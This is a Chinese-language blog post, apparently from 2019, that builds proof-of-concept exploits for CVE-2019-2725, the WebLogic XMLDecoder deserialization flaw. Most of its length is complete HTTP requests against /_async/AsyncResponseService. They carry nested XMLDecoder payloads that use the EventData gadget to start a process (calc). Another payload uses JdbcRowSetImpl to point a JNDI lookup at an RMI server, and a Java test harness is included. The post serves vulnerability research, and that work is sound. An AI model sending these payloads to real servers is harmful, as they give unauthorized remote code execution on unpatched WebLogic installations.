Fork me on GitHub

# CVE-2019-2725二次反序列化EventData Gadget POC/JdbcRowSetImpl POC构造

CVE-2019-2725二次反序列化EventData Gadget POC

构造MapMsgEntity POC时会爆如下错误,原因畅师傅已经说了,当前类不是public
Alt text
具体想跟一下怎么报错的,可以这样操作,报错代码如下:

java.lang.NoSuchMethodException: <unbound>=Class.new(byteArray);

全局搜索NoSuchMethodException,直到执行到这个地方,从调用栈回溯,追踪一下就ok了。
Alt text
漏洞代码如下:
Alt text
POC如下,不知道EventData类传递string类型的参数怎么写。怼出如下数据包了,能够执行命令,这里是一个坑点,还得看下大佬怎么构造的poc

POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 885


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
<java><class><string>org.slf4j.ext.EventData</string><void>
<array class="java.lang.String" length="1">
  <void index="0">
   <string>"<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>"</string>
  </void>
 </array>
</void></class>
</java>
 </work:WorkContext>
 </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

运行如下代码就能执行命令

package weblogic;
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
public class Test {
    //ByteArrayInputStream本身操作的是一个数组,并没有打开文件描述之类的,所有不需要关闭流

    public static void main(String[] args) {
        ByteArrayInputStream bais=null;
        StringBuilder sb=new StringBuilder();
        int temp=0;
        int num=0;
        long date1=System.currentTimeMillis();
        try{

            //bais也就是我们构造好的payload
            bais=new ByteArrayInputStream("<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"><object class=\"java.lang.ProcessBuilder\"><array class=\"java.lang.String\" length=\"1\"><void index=\"0\"><string>calc</string></void></array><void method=\"start\" /></object></java>".getBytes());
            XMLDecoder decoder = new XMLDecoder(bais);
            decoder.readObject();
            while((temp=bais.read())!=-1){
                sb.append((char)temp);
                num++;
            }
            System.out.println(sb);
            System.out.println("读取的字节数:"+num);
        }finally{
            try{
                bais.close();//不需要关闭流的,但是调用close没有任何影响,close不做任何事情
            }catch(IOException e){
                e.printStackTrace();
            }
            new File("d:"+File.separator+"a.txt");//File.separator是一个文件分隔符,在windows和linux平台下运行都没有问题
        }
        long date2=System.currentTimeMillis();
        System.out.println("耗时:"+(date2-date1));

    }

}

Alt text
调试的时候发现代码执行不到.
真的很迷,上面poc怎么弹的计算器都不知道。最终Poc如下,原来参数可以放在这里<void><string><![CDATA[POC]]></string></void>

POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 801


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
<java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>]]></string>
</void></class>
</java>
 </work:WorkContext>
 </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

代码最终来到这里,RCE.
Alt text
还有com.sun.rowset.JdbcRowSetImpl类最后一个POC编写,一定要搞出来啊。

CVE-2019-2725二次反序列化JdbcRowSetImpl Gadget POC构造

jdk1.6没有property标签,jdk 1.7以上可以使用。因为绕过需要用到property标签赋值,只能用于weblogic12版本,weblogic10.3.6版本会爆如下错误:

java.lang.Exception: Unrecognized opening tag: property name="dataSourceName"
Continuing ...
java.lang.Exception: Unrecognized closing tag: property
Continuing ...
java.lang.Exception: Unrecognized opening tag: property name="autoCommit"
Continuing ...
java.lang.Exception: Unrecognized closing tag: property
Continuing ...
java.lang.NoSuchMethodException: <unbound>=Class.new("rmi://localhost:9999/aa", Boolean);

POC如下:

POST /_async/AsyncResponseService HTTP/1.1
Host: 121.195.170.96:7001
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 694


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
<java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>
<property name="dataSourceName"><string>rmi://localhost:9999/aa</string></property><property name="autoCommit"><boolean>true</boolean></property>
</void></class>
</java>
 </work:WorkContext>
 </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

property标签代替<void property="">
之前的POC

    <void class="com.sun.rowset.JdbcRowSetImpl">
        <void property="dataSourceName">
         <string>rmi://121.195.170.127:2222/aa</string>
        </void>
        <void property="autoCommit">
            <boolean>true</boolean>
        </void>
    </void>
</java>

绕过的POC

<java>
<class>
<string>com.sun.rowset.JdbcRowSetImpl</string>
<void>
	<property name="dataSourceName"><string>rmi://localhost:9999/aa</string>
	</property>
	<property name="autoCommit">
	<boolean>true</boolean>
	</property>
</void>
</class>
</java>

漏洞就不调试了,看我之前写过的https://www.cnblogs.com/afanti/p/10222293.html
Alt text
参考链接:
https://paper.seebug.org/909/
给XML的property属性赋value

posted @ 2019-05-05 20:27  Afant1  阅读(653)  评论(0编辑  收藏  举报